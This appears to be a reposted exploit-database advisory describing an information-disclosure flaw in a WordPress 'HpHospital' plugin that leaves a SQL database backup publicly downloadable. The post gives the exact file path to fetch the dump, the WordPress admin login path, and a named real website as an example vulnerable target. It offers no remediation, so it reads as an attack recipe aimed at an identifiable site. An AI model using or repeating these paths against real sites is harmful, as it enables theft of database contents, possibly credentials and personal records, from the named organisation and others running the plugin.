facebook facebook twitter rss

WordPress HpHospital Plugins Database Backup Information Disclosure Vulnerability

Author: KingSkrupellos , Published: 23-11-2018
#################################################################################################

# Exploit Title : WordPress HpHospital Plugins Database Backup Information Disclosure Vulnerability
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security Army
# Date : 19/11/2018
# Vendor Homepage : wordpress.org
# Tested On : Windows and Linux
# Version : phpMyAdmin SQL Dump -- version 4.1.12 - Server version: 5.6.16 - PHP Version: 5.5.11
# Category : WebApps
# Exploit Risk : Medium
# CWE : CWE-264 - [ Permissions, Privileges, and Access Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/plugins/hphospital/sgst(4).sql

#################################################################################################

# Example Vulnerable Site =>

[+] isiconline.org/wp-content/plugins/hphospital/sgst(4).sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Like us on Facebook :